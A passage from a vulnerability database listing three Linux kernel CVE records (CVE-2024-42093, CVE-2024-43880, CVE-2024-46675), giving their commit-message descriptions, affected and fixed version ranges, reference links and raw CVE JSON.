Affected: 93ddf0b211a0a0367d01c9587169c16ed77b4b98 , < 763896ab62a672d728f5eb10ac90d98c607a8509 (git)
Affected: 93ddf0b211a0a0367d01c9587169c16ed77b4b98 , < a55afc0f5f20ba30970aaf7271929dc00eee5e7d (git)
Affected: 93ddf0b211a0a0367d01c9587169c16ed77b4b98 , < 48147337d7efdea6ad6e49f5b8eb894b95868ef0 (git)
Affected: 93ddf0b211a0a0367d01c9587169c16ed77b4b98 , < 69f49527aea12c23b78fb3d0a421950bf44fb4e2 (git)
Affected: 93ddf0b211a0a0367d01c9587169c16ed77b4b98 , < 5e4f25091e6d06e99a23f724c839a58a8776a527 (git)
Affected: 93ddf0b211a0a0367d01c9587169c16ed77b4b98 , < d33fe1714a44ff540629b149d8fab4ac6967585c (git)

Linux

Affected: 4.16
Unaffected: 0 , < 4.16 (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:26.130Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b2262b3be27cee334a2fa175ae3afb53f38fb0b1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/763896ab62a672d728f5eb10ac90d98c607a8509"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a55afc0f5f20ba30970aaf7271929dc00eee5e7d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/48147337d7efdea6ad6e49f5b8eb894b95868ef0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/69f49527aea12c23b78fb3d0a421950bf44fb4e2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5e4f25091e6d06e99a23f724c839a58a8776a527"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d33fe1714a44ff540629b149d8fab4ac6967585c"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42093",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:18:31.047930Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:00.736Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b2262b3be27cee334a2fa175ae3afb53f38fb0b1",
              "status": "affected",
              "version": "93ddf0b211a0a0367d01c9587169c16ed77b4b98",
              "versionType": "git"
            },
            {
              "lessThan": "763896ab62a672d728f5eb10ac90d98c607a8509",
              "status": "affected",
              "version": "93ddf0b211a0a0367d01c9587169c16ed77b4b98",
              "versionType": "git"
            },
            {
              "lessThan": "a55afc0f5f20ba30970aaf7271929dc00eee5e7d",
              "status": "affected",
              "version": "93ddf0b211a0a0367d01c9587169c16ed77b4b98",
              "versionType": "git"
            },
            {
              "lessThan": "48147337d7efdea6ad6e49f5b8eb894b95868ef0",
              "status": "affected",
              "version": "93ddf0b211a0a0367d01c9587169c16ed77b4b98",
              "versionType": "git"
            },
            {
              "lessThan": "69f49527aea12c23b78fb3d0a421950bf44fb4e2",
              "status": "affected",
              "version": "93ddf0b211a0a0367d01c9587169c16ed77b4b98",
              "versionType": "git"
            },
            {
              "lessThan": "5e4f25091e6d06e99a23f724c839a58a8776a527",
              "status": "affected",
              "version": "93ddf0b211a0a0367d01c9587169c16ed77b4b98",
              "versionType": "git"
            },
            {
              "lessThan": "d33fe1714a44ff540629b149d8fab4ac6967585c",
              "status": "affected",
              "version": "93ddf0b211a0a0367d01c9587169c16ed77b4b98",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.16"
            },
            {
              "lessThan": "4.16",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/dpaa2: Avoid explicit cpumask var allocation on stack\n\nFor CONFIG_CPUMASK_OFFSTACK=y kernel, explicit allocation of cpumask\nvariable on stack is not recommended since it can cause potential stack\noverflow.\n\nInstead, kernel code should always use *cpumask_var API(s) to allocate\ncpumask var in config-neutral way, leaving allocation strategy to\nCONFIG_CPUMASK_OFFSTACK.\n\nUse *cpumask_var API(s) to address it."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-21T09:12:57.748Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b2262b3be27cee334a2fa175ae3afb53f38fb0b1"
        },
        {
          "url": "https://git.kernel.org/stable/c/763896ab62a672d728f5eb10ac90d98c607a8509"
        },
        {
          "url": "https://git.kernel.org/stable/c/a55afc0f5f20ba30970aaf7271929dc00eee5e7d"
        },
        {
          "url": "https://git.kernel.org/stable/c/48147337d7efdea6ad6e49f5b8eb894b95868ef0"
        },
        {
          "url": "https://git.kernel.org/stable/c/69f49527aea12c23b78fb3d0a421950bf44fb4e2"
        },
        {
          "url": "https://git.kernel.org/stable/c/5e4f25091e6d06e99a23f724c839a58a8776a527"
        },
        {
          "url": "https://git.kernel.org/stable/c/d33fe1714a44ff540629b149d8fab4ac6967585c"
        }
      ],
      "title": "net/dpaa2: Avoid explicit cpumask var allocation on stack",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42093",
    "datePublished": "2024-07-29T17:39:29.470Z",
    "dateReserved": "2024-07-29T15:50:41.172Z",
    "dateUpdated": "2025-11-03T22:01:26.130Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-43880 (GCVE-0-2024-43880)

Vulnerability from cvelistv5 – Published: 2024-08-21 00:06 – Updated: 2025-11-03 22:06

Title

mlxsw: spectrum_acl_erp: Fix object nesting warning

Summary

In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_acl_erp: Fix object nesting warning ACLs in Spectrum-2 and newer ASICs can reside in the algorithmic TCAM (A-TCAM) or in the ordinary circuit TCAM (C-TCAM). The former can contain more ACLs (i.e., tc filters), but the number of masks in each region (i.e., tc chain) is limited. In order to mitigate the effects of the above limitation, the device allows filters to share a single mask if their masks only differ in up to 8 consecutive bits. For example, dst_ip/25 can be represented using dst_ip/24 with a delta of 1 bit. The C-TCAM does not have a limit on the number of masks being used (and therefore does not support mask aggregation), but can contain a limited number of filters. The driver uses the "objagg" library to perform the mask aggregation by passing it objects that consist of the filter's mask and whether the filter is to be inserted into the A-TCAM or the C-TCAM since filters in different TCAMs cannot share a mask. The set of created objects is dependent on the insertion order of the filters and is not necessarily optimal. Therefore, the driver will periodically ask the library to compute a more optimal set ("hints") by looking at all the existing objects. When the library asks the driver whether two objects can be aggregated the driver only compares the provided masks and ignores the A-TCAM / C-TCAM indication. This is the right thing to do since the goal is to move as many filters as possible to the A-TCAM. The driver also forbids two identical masks from being aggregated since this can only happen if one was intentionally put in the C-TCAM to avoid a conflict in the A-TCAM. The above can result in the following set of hints: H1: {mask X, A-TCAM} -> H2: {mask Y, A-TCAM} // X is Y + delta H3: {mask Y, C-TCAM} -> H4: {mask Z, A-TCAM} // Y is Z + delta After getting the hints from the library the driver will start migrating filters from one region to another while consulting the computed hints and instructing the device to perform a lookup in both regions during the transition. Assuming a filter with mask X is being migrated into the A-TCAM in the new region, the hints lookup will return H1. Since H2 is the parent of H1, the library will try to find the object associated with it and create it if necessary in which case another hints lookup (recursive) will be performed. This hints lookup for {mask Y, A-TCAM} will either return H2 or H3 since the driver passes the library an object comparison function that ignores the A-TCAM / C-TCAM indication. This can eventually lead to nested objects which are not supported by the library [1]. Fix by removing the object comparison function from both the driver and the library as the driver was the only user. That way the lookup will only return exact matches. I do not have a reliable reproducer that can reproduce the issue in a timely manner, but before the fix the issue would reproduce in several minutes and with the fix it does not reproduce in over an hour. Note that the current usefulness of the hints is limited because they include the C-TCAM indication and represent aggregation that cannot actually happen. This will be addressed in net-next. [1] WARNING: CPU: 0 PID: 153 at lib/objagg.c:170 objagg_obj_parent_assign+0xb5/0xd0 Modules linked in: CPU: 0 PID: 153 Comm: kworker/0:18 Not tainted 6.9.0-rc6-custom-g70fbc2c1c38b #42 Hardware name: Mellanox Technologies Ltd. MSN3700C/VMOD0008, BIOS 5.11 10/10/2018 Workqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work RIP: 0010:objagg_obj_parent_assign+0xb5/0xd0 [...] Call Trace: <TASK> __objagg_obj_get+0x2bb/0x580 objagg_obj_get+0xe/0x80 mlxsw_sp_acl_erp_mask_get+0xb5/0xf0 mlxsw_sp_acl_atcam_entry_add+0xe8/0x3c0 mlxsw_sp_acl_tcam_entry_create+0x5e/0xa0 mlxsw_sp_acl_tcam_vchunk_migrate_one+0x16b/0x270 mlxsw_sp_acl_tcam_vregion_rehash_work+0xbe/0x510 process_one_work+0x151/0x370

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/4dc09f6f260db3c45…
	https://git.kernel.org/stable/c/36a9996e020dd5aa3…
	https://git.kernel.org/stable/c/9a5261a984bba4f58…
	https://git.kernel.org/stable/c/25c6fd9648ad05da4…
	https://git.kernel.org/stable/c/0e59c2d2285326670…
	https://git.kernel.org/stable/c/fb5d4fc578e655d11…
	https://git.kernel.org/stable/c/97d833ceb27dc19f8…

Impacted products

Vendor

Product

Version

Linux

Affected: 9069a3817d82b01b3a55da382c774e3575946130 , < 4dc09f6f260db3c4565a4ec52ba369393598f2fb (git)
Affected: 9069a3817d82b01b3a55da382c774e3575946130 , < 36a9996e020dd5aa325e0ecc55eb2328288ea6bb (git)
Affected: 9069a3817d82b01b3a55da382c774e3575946130 , < 9a5261a984bba4f583d966c550fa72c33ff3714e (git)
Affected: 9069a3817d82b01b3a55da382c774e3575946130 , < 25c6fd9648ad05da493a5d30881896a78a08b624 (git)
Affected: 9069a3817d82b01b3a55da382c774e3575946130 , < 0e59c2d22853266704e127915653598f7f104037 (git)
Affected: 9069a3817d82b01b3a55da382c774e3575946130 , < fb5d4fc578e655d113f09565f6f047e15f7ab578 (git)
Affected: 9069a3817d82b01b3a55da382c774e3575946130 , < 97d833ceb27dc19f8777d63f90be4a27b5daeedf (git)

Linux

Affected: 5.1
Unaffected: 0 , < 5.1 (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.103 , ≤ 6.1.* (semver)
Unaffected: 6.6.44 , ≤ 6.6.* (semver)
Unaffected: 6.10.3 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-43880",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:05:51.322073Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:17.371Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:06:33.576Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c",
            "include/linux/objagg.h",
            "lib/objagg.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "4dc09f6f260db3c4565a4ec52ba369393598f2fb",
              "status": "affected",
              "version": "9069a3817d82b01b3a55da382c774e3575946130",
              "versionType": "git"
            },
            {
              "lessThan": "36a9996e020dd5aa325e0ecc55eb2328288ea6bb",
              "status": "affected",
              "version": "9069a3817d82b01b3a55da382c774e3575946130",
              "versionType": "git"
            },
            {
              "lessThan": "9a5261a984bba4f583d966c550fa72c33ff3714e",
              "status": "affected",
              "version": "9069a3817d82b01b3a55da382c774e3575946130",
              "versionType": "git"
            },
            {
              "lessThan": "25c6fd9648ad05da493a5d30881896a78a08b624",
              "status": "affected",
              "version": "9069a3817d82b01b3a55da382c774e3575946130",
              "versionType": "git"
            },
            {
              "lessThan": "0e59c2d22853266704e127915653598f7f104037",
              "status": "affected",
              "version": "9069a3817d82b01b3a55da382c774e3575946130",
              "versionType": "git"
            },
            {
              "lessThan": "fb5d4fc578e655d113f09565f6f047e15f7ab578",
              "status": "affected",
              "version": "9069a3817d82b01b3a55da382c774e3575946130",
              "versionType": "git"
            },
            {
              "lessThan": "97d833ceb27dc19f8777d63f90be4a27b5daeedf",
              "status": "affected",
              "version": "9069a3817d82b01b3a55da382c774e3575946130",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c",
            "include/linux/objagg.h",
            "lib/objagg.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.1"
            },
            {
              "lessThan": "5.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.103",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.44",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.103",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.44",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.3",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_acl_erp: Fix object nesting warning\n\nACLs in Spectrum-2 and newer ASICs can reside in the algorithmic TCAM\n(A-TCAM) or in the ordinary circuit TCAM (C-TCAM). The former can\ncontain more ACLs (i.e., tc filters), but the number of masks in each\nregion (i.e., tc chain) is limited.\n\nIn order to mitigate the effects of the above limitation, the device\nallows filters to share a single mask if their masks only differ in up\nto 8 consecutive bits. For example, dst_ip/25 can be represented using\ndst_ip/24 with a delta of 1 bit. The C-TCAM does not have a limit on the\nnumber of masks being used (and therefore does not support mask\naggregation), but can contain a limited number of filters.\n\nThe driver uses the \"objagg\" library to perform the mask aggregation by\npassing it objects that consist of the filter\u0027s mask and whether the\nfilter is to be inserted into the A-TCAM or the C-TCAM since filters in\ndifferent TCAMs cannot share a mask.\n\nThe set of created objects is dependent on the insertion order of the\nfilters and is not necessarily optimal. Therefore, the driver will\nperiodically ask the library to compute a more optimal set (\"hints\") by\nlooking at all the existing objects.\n\nWhen the library asks the driver whether two objects can be aggregated\nthe driver only compares the provided masks and ignores the A-TCAM /\nC-TCAM indication. This is the right thing to do since the goal is to\nmove as many filters as possible to the A-TCAM. The driver also forbids\ntwo identical masks from being aggregated since this can only happen if\none was intentionally put in the C-TCAM to avoid a conflict in the\nA-TCAM.\n\nThe above can result in the following set of hints:\n\nH1: {mask X, A-TCAM} -\u003e H2: {mask Y, A-TCAM} // X is Y + delta\nH3: {mask Y, C-TCAM} -\u003e H4: {mask Z, A-TCAM} // Y is Z + delta\n\nAfter getting the hints from the library the driver will start migrating\nfilters from one region to another while consulting the computed hints\nand instructing the device to perform a lookup in both regions during\nthe transition.\n\nAssuming a filter with mask X is being migrated into the A-TCAM in the\nnew region, the hints lookup will return H1. Since H2 is the parent of\nH1, the library will try to find the object associated with it and\ncreate it if necessary in which case another hints lookup (recursive)\nwill be performed. This hints lookup for {mask Y, A-TCAM} will either\nreturn H2 or H3 since the driver passes the library an object comparison\nfunction that ignores the A-TCAM / C-TCAM indication.\n\nThis can eventually lead to nested objects which are not supported by\nthe library [1].\n\nFix by removing the object comparison function from both the driver and\nthe library as the driver was the only user. That way the lookup will\nonly return exact matches.\n\nI do not have a reliable reproducer that can reproduce the issue in a\ntimely manner, but before the fix the issue would reproduce in several\nminutes and with the fix it does not reproduce in over an hour.\n\nNote that the current usefulness of the hints is limited because they\ninclude the C-TCAM indication and represent aggregation that cannot\nactually happen. This will be addressed in net-next.\n\n[1]\nWARNING: CPU: 0 PID: 153 at lib/objagg.c:170 objagg_obj_parent_assign+0xb5/0xd0\nModules linked in:\nCPU: 0 PID: 153 Comm: kworker/0:18 Not tainted 6.9.0-rc6-custom-g70fbc2c1c38b #42\nHardware name: Mellanox Technologies Ltd. MSN3700C/VMOD0008, BIOS 5.11 10/10/2018\nWorkqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work\nRIP: 0010:objagg_obj_parent_assign+0xb5/0xd0\n[...]\nCall Trace:\n \u003cTASK\u003e\n __objagg_obj_get+0x2bb/0x580\n objagg_obj_get+0xe/0x80\n mlxsw_sp_acl_erp_mask_get+0xb5/0xf0\n mlxsw_sp_acl_atcam_entry_add+0xe8/0x3c0\n mlxsw_sp_acl_tcam_entry_create+0x5e/0xa0\n mlxsw_sp_acl_tcam_vchunk_migrate_one+0x16b/0x270\n mlxsw_sp_acl_tcam_vregion_rehash_work+0xbe/0x510\n process_one_work+0x151/0x370"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:28:26.245Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/4dc09f6f260db3c4565a4ec52ba369393598f2fb"
        },
        {
          "url": "https://git.kernel.org/stable/c/36a9996e020dd5aa325e0ecc55eb2328288ea6bb"
        },
        {
          "url": "https://git.kernel.org/stable/c/9a5261a984bba4f583d966c550fa72c33ff3714e"
        },
        {
          "url": "https://git.kernel.org/stable/c/25c6fd9648ad05da493a5d30881896a78a08b624"
        },
        {
          "url": "https://git.kernel.org/stable/c/0e59c2d22853266704e127915653598f7f104037"
        },
        {
          "url": "https://git.kernel.org/stable/c/fb5d4fc578e655d113f09565f6f047e15f7ab578"
        },
        {
          "url": "https://git.kernel.org/stable/c/97d833ceb27dc19f8777d63f90be4a27b5daeedf"
        }
      ],
      "title": "mlxsw: spectrum_acl_erp: Fix object nesting warning",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-43880",
    "datePublished": "2024-08-21T00:06:32.562Z",
    "dateReserved": "2024-08-17T09:11:59.287Z",
    "dateUpdated": "2025-11-03T22:06:33.576Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46675 (GCVE-0-2024-46675)

Vulnerability from cvelistv5 – Published: 2024-09-13 05:29 – Updated: 2026-01-05 10:52

Title

usb: dwc3: core: Prevent USB core invalid event buffer address access

Summary

In the Linux kernel, the following vulnerability has been resolved: usb: dwc3: core: Prevent USB core invalid event buffer address access This commit addresses an issue where the USB core could access an invalid event buffer address during runtime suspend, potentially causing SMMU faults and other memory issues in Exynos platforms. The problem arises from the following sequence. 1. In dwc3_gadget_suspend, there is a chance of a timeout when moving the USB core to the halt state after clearing the run/stop bit by software. 2. In dwc3_core_exit, the event buffer is cleared regardless of the USB core's status, which may lead to an SMMU faults and other memory issues. if the USB core tries to access the event buffer address. To prevent this hardware quirk on Exynos platforms, this commit ensures that the event buffer address is not cleared by software when the USB core is active during runtime suspend by checking its status before clearing the buffer address.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/eca3f543f817da87c…
	https://git.kernel.org/stable/c/d2afc2bffec77316b…
	https://git.kernel.org/stable/c/b72da4d89b97da71e…
	https://git.kernel.org/stable/c/111277b881def3153…
	https://git.kernel.org/stable/c/2189fd13c577d7881…
	https://git.kernel.org/stable/c/7bb11a75dd4d36123…
	https://git.kernel.org/stable/c/e23f6ad8d110bf632…
	https://git.kernel.org/stable/c/14e497183df28c006…

Impacted products

Vendor

Product

Version

Linux

Affected: 9f8a67b65a49d0e35c6ca782136c84541d948a64 , < eca3f543f817da87c00d1a5697b473efb548204f (git)
Affected: 9f8a67b65a49d0e35c6ca782136c84541d948a64 , < d2afc2bffec77316b90d530b07695e3f534df914 (git)
Affected: 9f8a67b65a49d0e35c6ca782136c84541d948a64 , < b72da4d89b97da71e056cc4d1429b2bc426a9c2f (git)
Affected: 9f8a67b65a49d0e35c6ca782136c84541d948a64 , < 111277b881def3153335acfe0d1f43e6cd83ac93 (git)
Affected: 9f8a67b65a49d0e35c6ca782136c84541d948a64 , < 2189fd13c577d7881f94affc09c950a795064c4b (git)
Affected: 9f8a67b65a49d0e35c6ca782136c84541d948a64 , < 7bb11a75dd4d3612378b90e2a4aa49bdccea28ab (git)
Affected: 9f8a67b65a49d0e35c6ca782136c84541d948a64 , < e23f6ad8d110bf632f7471482e10b43dc174fb72 (git)
Affected: 9f8a67b65a49d0e35c6ca782136c84541d948a64 , < 14e497183df28c006603cc67fd3797a537eef7b9 (git)

Linux

Affected: 4.8
Unaffected: 0 , < 4.8 (semver)
Unaffected: 4.19.321 , ≤ 4.19.* (semver)
Unaffected: 5.4.283 , ≤ 5.4.* (semver)
Unaffected: 5.10.225 , ≤ 5.10.* (semver)
Unaffected: 5.15.166 , ≤ 5.15.* (semver)
Unaffected: 6.1.108 , ≤ 6.1.* (semver)
Unaffected: 6.6.49 , ≤ 6.6.* (semver)
Unaffected: 6.10.8 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46675",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T15:44:29.981385Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T15:44:43.856Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:16:11.115Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/dwc3/core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
